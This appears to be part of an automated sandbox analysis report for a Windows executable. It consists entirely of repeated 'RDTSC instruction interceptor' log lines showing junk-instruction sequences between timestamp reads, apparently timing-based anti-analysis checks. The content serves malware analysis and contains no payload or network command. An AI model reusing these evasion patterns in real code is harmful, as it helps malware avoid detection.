              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6E4211 second address: 6E4217 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7361F4 second address: 7361FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7361FA second address: 7361FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 73635F second address: 736365 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 736365 second address: 736396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jne 00007FCD7C4F0DB8h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 736DB2 second address: 736DBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FCD7D2AFB06h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 736DBC second address: 736DD9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FCD7C4F0DA3h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 736DD9 second address: 736DED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7D2AFB10h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 73FEC0 second address: 73FECA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 740480 second address: 740486 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 740D3B second address: 740D58 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCD7C4F0DA8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7412E0 second address: 7412F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FCD7D2AFB06h 0x0000000a pop edx 0x0000000b jo 00007FCD7D2AFB34h 0x00000011 push ebx 0x00000012 push eax 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7412F6 second address: 741313 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FCD7C4F0DA0h 0x0000000c jp 00007FCD7C4F0D96h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 741313 second address: 741317 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 744E45 second address: 744E49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 74525A second address: 74525E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 74544D second address: 745451 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 745451 second address: 74546B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FCD7D2AFB12h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 74546B second address: 74547E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7C4F0D9Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7455A4 second address: 7455B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jo 00007FCD7D2AFB06h 0x0000000d pop eax 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7455B2 second address: 7455BC instructions: 0x00000000 rdtsc 0x00000002 je 00007FCD7C4F0D9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 753CA9 second address: 753CAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 751CAB second address: 751CBC instructions: 0x00000000 rdtsc 0x00000002 jng 00007FCD7C4F0D96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 751E66 second address: 751EA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pushad 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop eax 0x0000000f push ebx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pop ebx 0x00000013 jnp 00007FCD7D2AFB0Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FCD7D2AFB0Dh 0x00000020 jmp 00007FCD7D2AFB12h 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 751EA6 second address: 751EB0 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FCD7C4F0D96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 752947 second address: 752951 instructions: 0x00000000 rdtsc 0x00000002 je 00007FCD7D2AFB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 752AFC second address: 752B02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 753B64 second address: 753B68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7518C3 second address: 7518D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007FCD7C4F0D9Ah 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 75947F second address: 759485 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 759485 second address: 75948B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 759607 second address: 75960B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7605CF second address: 7605D9 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FCD7C4F0D96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 76046D second address: 760479 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FCD7D2AFB0Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 760479 second address: 760488 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jng 00007FCD7C4F0D96h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 768E02 second address: 768E0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jo 00007FCD7D2AFB08h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 775632 second address: 775636 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 775636 second address: 775653 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7D2AFB0Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007FCD7D2AFB06h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 775653 second address: 775657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 775657 second address: 77565B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 77D380 second address: 77D384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 77D23E second address: 77D242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7845E5 second address: 7845F5 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FCD7C4F0D96h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7845F5 second address: 7845FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 784737 second address: 78473B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 78473B second address: 784746 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 784A2F second address: 784A4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FCD7C4F0DA9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 784A4E second address: 784A6B instructions: 0x00000000 rdtsc 0x00000002 jl 00007FCD7D2AFB0Eh 0x00000008 pushad 0x00000009 popad 0x0000000a jno 00007FCD7D2AFB06h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 pop eax 0x00000017 jl 00007FCD7D2AFB06h 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 784A6B second address: 784A8E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007FCD7C4F0DA7h 0x0000000e jnl 00007FCD7C4F0D96h 0x00000014 jmp 00007FCD7C4F0D9Bh 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 784A8E second address: 784AA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCD7D2AFB10h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 784AA2 second address: 784AA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 784AA6 second address: 784ABC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007FCD7D2AFB06h 0x00000010 je 00007FCD7D2AFB06h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 784D8C second address: 784D92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 785917 second address: 78591C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 78591C second address: 785943 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7C4F0D9Ah 0x00000007 jg 00007FCD7C4F0DAFh 0x0000000d jmp 00007FCD7C4F0DA3h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7894E9 second address: 7894EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7894EF second address: 78950D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jmp 00007FCD7C4F0DA4h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 78950D second address: 789517 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FCD7D2AFB06h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7972AE second address: 7972B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7972B2 second address: 7972C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FCD7D2AFB08h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7943ED second address: 794420 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7C4F0DA7h 0x00000007 jmp 00007FCD7C4F0DA4h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 794420 second address: 79442A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FCD7D2AFB06h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 79442A second address: 79442E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 79442E second address: 794434 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 794434 second address: 79443E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FCD7C4F0D96h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 79443E second address: 794442 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7A5157 second address: 7A517E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push edx 0x0000000a pop edx 0x0000000b jc 00007FCD7C4F0D96h 0x00000011 js 00007FCD7C4F0D96h 0x00000017 popad 0x00000018 popad 0x00000019 pushad 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 push edi 0x00000021 pushad 0x00000022 popad 0x00000023 pop edi 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7A517E second address: 7A5184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7A5184 second address: 7A51AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007FCD7C4F0D96h 0x0000000d jmp 00007FCD7C4F0DA9h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7A4F76 second address: 7A4F8A instructions: 0x00000000 rdtsc 0x00000002 jns 00007FCD7D2AFB0Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7A6D53 second address: 7A6D57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7A6D57 second address: 7A6D5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7A6D5F second address: 7A6D65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7A6D65 second address: 7A6D69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7BBAB3 second address: 7BBAB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7BBAB7 second address: 7BBACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FCD7D2AFB12h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7BBACF second address: 7BBAD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7BBAD5 second address: 7BBADB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7BBADB second address: 7BBAF1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7C4F0DA2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7BBAF1 second address: 7BBB0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FCD7D2AFB0Eh 0x0000000c pushad 0x0000000d popad 0x0000000e jnl 00007FCD7D2AFB06h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7BBB0E second address: 7BBB13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7BBB13 second address: 7BBB34 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FCD7D2AFB12h 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b push edx 0x0000000c pop edx 0x0000000d jbe 00007FCD7D2AFB06h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7BAA7F second address: 7BAA89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FCD7C4F0D96h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7BAA89 second address: 7BAAD6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7D2AFB16h 0x00000007 je 00007FCD7D2AFB06h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 pushad 0x00000011 jmp 00007FCD7D2AFB12h 0x00000016 push esi 0x00000017 push eax 0x00000018 pop eax 0x00000019 je 00007FCD7D2AFB06h 0x0000001f pop esi 0x00000020 push ecx 0x00000021 jmp 00007FCD7D2AFB0Ch 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7BAC30 second address: 7BAC50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FCD7C4F0D96h 0x0000000a pop ecx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FCD7C4F0D9Fh 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7BAC50 second address: 7BAC56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7BAC56 second address: 7BAC63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007FCD7C4F0D96h 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7BAC63 second address: 7BAC68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7BAC68 second address: 7BAC74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FCD7C4F0D96h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7BADD8 second address: 7BADF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCD7D2AFB0Eh 0x00000009 jnc 00007FCD7D2AFB06h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7BADF0 second address: 7BADF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7BADF4 second address: 7BAE1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCD7D2AFB0Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007FCD7D2AFB06h 0x00000013 jmp 00007FCD7D2AFB0Dh 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7BAF5E second address: 7BAF75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7C4F0DA1h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7BB33E second address: 7BB352 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7D2AFB10h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7BB352 second address: 7BB368 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7C4F0D9Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007FCD7C4F0D96h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7BB368 second address: 7BB37C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FCD7D2AFB06h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
